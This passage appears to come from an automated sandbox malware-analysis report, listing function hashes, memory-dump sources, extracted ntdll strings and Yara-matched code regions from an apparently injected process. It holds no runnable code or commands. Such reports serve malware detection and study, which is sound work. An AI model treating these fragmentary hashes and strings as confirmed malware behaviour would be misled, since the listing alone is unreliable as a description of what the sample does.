                                            • Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222
                                            Function 010C2DB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                            • Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
                                            • Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                            • Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62
                                            Function 010C2DD0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                            • Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
                                            • Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                            • Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722
                                            Function 010C2C60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                            • Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
                                            • Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                            • Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622
                                            Function 010C2CA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                            • Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
                                            • Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                            • Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232
                                            Function 010C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                            • Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
                                            • Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                            • Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2
                                            Function 010C2CF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                            • Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
                                            • Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                            • Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222
                                            Function 010C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                            • Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
                                            • Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                            • Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227
                                            Function 010C2F60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                            • Instruction ID: 552f532c1675269c3b3b5824642c33acef3bd1e139ee3a15d1006b619f1bd633
                                            • Opcode Fuzzy Hash: 911090696b6d7dd4dfe98c2c72ec45f3ee042527ab633d0fbbc7497e2e60e948
                                            • Instruction Fuzzy Hash: ED90047531151043F104715CC4047070055D7F1301F55C013F3554554CC53DCD715337
                                            Function 010C2F90 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                            • Instruction ID: fa4645ee22d2b2d1daa6b35222647d3a2351f61f11ef2b2a6cf40949d43d66df
                                            • Opcode Fuzzy Hash: 872364fdf7f221f561f1ca42c108a7bc8b613c5e92ceda6f915aee74fe43ec84
                                            • Instruction Fuzzy Hash: 2A90023520191402E100715C881470B001597D0302F55C012E1564555DC62589516672
                                            Function 010C2FA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                            • Instruction ID: 15ccf085ea955a9f8cf04d686fd7131f5c102fe7d2daacf0ffed59c704dd16b3
                                            • Opcode Fuzzy Hash: baf3db33e038aba8c706569ee8ace855abc613a7f98a29aab5352f277aef823a
                                            • Instruction Fuzzy Hash: B790023520191402E100715C8808747001597D0302F55C012E5564555EC665C9916632
                                            Function 010C2FB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                            • Instruction ID: bd63e9d360c8fc32940e01b5e3bfe276d81c83880dc6b2e3e915f593f13d48ff
                                            • Opcode Fuzzy Hash: 1b97a59ccf8e7fea65267712fbd286b6411270be9fff84a2cf951bc2b41b8717
                                            • Instruction Fuzzy Hash: 9F900225601510425140716CC8449064015BBE1211755C122E0D98550DC55989655766
                                            Function 010C2FE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                            • Instruction ID: f9e4b64ccdf6de43697c09f54e28a01be5dd1c21a44b465b23d6e37b0fffc015
                                            • Opcode Fuzzy Hash: ea4bf5946d20526b400ab279e167b4e92acb0af8bf3038e54aa7ad10297ce80e
                                            • Instruction Fuzzy Hash: 58900225211D1042E200756C8C14B07001597D0303F55C116E0554554CC91589615622
                                            Function 010C2E30 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                            • Instruction ID: 59a296c1882d376c5ffca640d23a70516df835ee6199f4ea7046ba19122cb285
                                            • Opcode Fuzzy Hash: 4adf1199c8229ca7609497c7664ef9af2974efa09ed7442d1245d0463f0ca263
                                            • Instruction Fuzzy Hash: B990022530151402E102715C84146060019D7D1345F95C013E1824555DC6258A53A233
                                            Function 010C2E80 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                            • Instruction ID: f12143e3dfc50a638a691c591602be029386b53a50cea896c01e4641a6047eb6
                                            • Opcode Fuzzy Hash: a5323294c590dda0d6297558ed6c040f83b7ab1addf1b5473bcf305c7304a568
                                            • Instruction Fuzzy Hash: EC90022560151502E101715C8404616001A97D0241F95C023E1424555ECA258A92A232
                                            Function 010C2EA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                            • Instruction ID: 3222d2b25440912e98916495796444b4e6e13cfb5da51f9e8f70c26cbc571d53
                                            • Opcode Fuzzy Hash: e9dd6f348aa56a76c0e3ac9d2bae00fb816baaa16c12caece1cda2714647f610
                                            • Instruction Fuzzy Hash: 5D90027520151402E140715C8404746001597D0301F55C012E5464554EC6598ED56766
                                            Function 010C2EE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                            • Instruction ID: 48d62672ad2af1dd8117a263e1245aef0e18e92ea8fc19626cffa350247d4461
                                            • Opcode Fuzzy Hash: 58a162e1178becfe42ebb1f5354aeb1859d0ac672b4b27307799ff8f32bd27a7
                                            • Instruction Fuzzy Hash: FC90026520191403E140755C8804607001597D0302F55C012E2464555ECA298D516236
                                            Function 010C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 8180b858bc80128465cbe62474224157435153773c8158baaad54eb40a782727
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 010C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                            • Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
                                            • Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                            • Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0
                                            Function 010B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
                                            • Execute=1, xrefs: 010F4713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
                                            • ExecuteOptions, xrefs: 010F46A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                            • Instruction ID: 8580cd0a3ef20cc38327123b3428a9ad663941a9626619f2f98fe76e5db42c8c
                                            • Opcode Fuzzy Hash: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                            • Instruction Fuzzy Hash: 60510A3164021A6AEB25AB68DCC6FEE77B8FF98704F0400EDD685AB1D1D7709A45CF50
                                            Function 010CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: 565991f5a84cc811990774e0501e5789307d9e90659fd9da6ded81411b8385b5
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: 92818D70E052499EEF258F6CC8527EEBBE1AF45BA0F18429DD8D1A7291C7389841CF51
                                            Function 010BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 010F7BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
                                            • RTL: Resource at %p, xrefs: 010F7B8E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                            • Instruction ID: ee38f48ee75ca746dff0801b9ca22ad25d9d87a5bcc66931b0bc15924dba093f
                                            • Opcode Fuzzy Hash: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                            • Instruction Fuzzy Hash: B04103317047038FD725DE29C881BAAB7E5EF89710F000A5DEAD6DB680DB72E405CB92
                                            Function 010BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 010F72C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
                                            • RTL: Resource at %p, xrefs: 010F72A3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                            • Instruction ID: 6b34566efaf609cbc033f023429df6feb55d21bcc59cf065ac6474823284b63f
                                            • Opcode Fuzzy Hash: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                            • Instruction Fuzzy Hash: 6841F035600203ABD765DE29CC82FAAB7E5FB54710F10461DFAD5AB680DB21E8028BD2
                                            Function 010C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: 9eac759cf03cbab8174b35a091a4dda483e5895753ba152793a1bf840550f1b3
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 62919071E0021A9BEB64DF6DC8816BEBBF5BF44B20F24855EE995E72C0D73099428F11
                                            Function 01089126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                            • Instruction ID: 081af244bdf6d8a74a0b9bab43b3cf8218a517e85957d7b716512119dbf3156f
                                            • Opcode Fuzzy Hash: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                            • Instruction Fuzzy Hash: CA812A72D042699FDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA0

                                            Executed Functions

                                            Function 0433320D Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 6$O$S$\$s
                                            • API String ID: 0-3854637164
                                            • Opcode ID: 7c3170e3d236d613c40dfe4163ebf5b7933fc002c5a813f6abe6224a13d6b32c
                                            • Instruction ID: 38e62b252419e49ebc3edbad14a728b79755f78edef665cd16fe8b5777896bce
                                            • Opcode Fuzzy Hash: 7c3170e3d236d613c40dfe4163ebf5b7933fc002c5a813f6abe6224a13d6b32c
                                            • Instruction Fuzzy Hash: FF519272D01218ABDB10DF94DC49EEEB3B8EF84715F10919AED0CA7140E7757A448BE1
                                            Function 0434184D Relevance: 3.8, Strings: 3, Instructions: 63COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: "5$"5$no
                                            • API String ID: 0-979101545
                                            • Opcode ID: ffe0835a6af6a440bbf1c12640cc4d4b6a1c0cc43d94c78e9aae10dd2ab829ac
                                            • Instruction ID: 368c65d180e1e77d38abfaa3b39f777e5f17c3f6e471ab6965aeb8d66a644335
                                            • Opcode Fuzzy Hash: ffe0835a6af6a440bbf1c12640cc4d4b6a1c0cc43d94c78e9aae10dd2ab829ac
                                            • Instruction Fuzzy Hash: 001112B6D01219AF9B00DFE9D8409EEB7F9EF48210F04526AE909E7200E7706A10CBA1
                                            Function 043253D9 Relevance: .6, Instructions: 606COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b27f808e905ead389b837fdd04111cfbec6399f002d69578f0a71b5f0d3d3f3d
                                            • Instruction ID: 7ec01adc21f6c41b67980dd89483179fb453f08f8d4347affed7ee5284fe3204
                                            • Opcode Fuzzy Hash: b27f808e905ead389b837fdd04111cfbec6399f002d69578f0a71b5f0d3d3f3d
                                            • Instruction Fuzzy Hash: A95233B0E05669DFEB24CF54CA94BDDBBB2BB44308F1091DAC1097B281D7B56A85CF50
                                            Function 0431EF2E Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97c446e7c684e205a147db2d0bd0bad360258b88769cc6c06c15be687329382a
                                            • Instruction ID: cee886c24e9f479f80ec6b1bf169a3c2707afabd4bee56b5d728e0a6a8f9f1e1
                                            • Opcode Fuzzy Hash: 97c446e7c684e205a147db2d0bd0bad360258b88769cc6c06c15be687329382a
                                            • Instruction Fuzzy Hash: EA4109B1D11219AFDB14CF99D885AEEBFB8EF49710F10515AFD14A7240D3B1A641CBA0
                                            Function 04343B1D Relevance: .1, Instructions: 85COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57df77fa2edecaab144d1c3f84079e37a9a35664cc7b6697b9d3fbd7b258eb20
                                            • Instruction ID: d5d3a44ff4223bda15b242108de549e89a7de8602a432a0e777458ca916f29a7
                                            • Opcode Fuzzy Hash: 57df77fa2edecaab144d1c3f84079e37a9a35664cc7b6697b9d3fbd7b258eb20
                                            • Instruction Fuzzy Hash: FC31E7B5A00648ABDB14DF99DC41EEFB7F9EF88304F108259F919A7240DB74B911CBA1
                                            Function 0434448D Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9131ece9dff2a077f5bf9143a58cc6cea21e35781ca6b7108eea3b5b9de700d8
                                            • Instruction ID: 0e4e5a54fa3bf74e3d584f262f0af5d7a19f2388ee519d7f6906489c0ea9f57d
                                            • Opcode Fuzzy Hash: 9131ece9dff2a077f5bf9143a58cc6cea21e35781ca6b7108eea3b5b9de700d8
                                            • Instruction Fuzzy Hash: 42212AB1A00309ABEB14DF98DC41EEFB7B9EF88300F004109F919A7280D774B9118BA1
                                            Function 0433304D Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
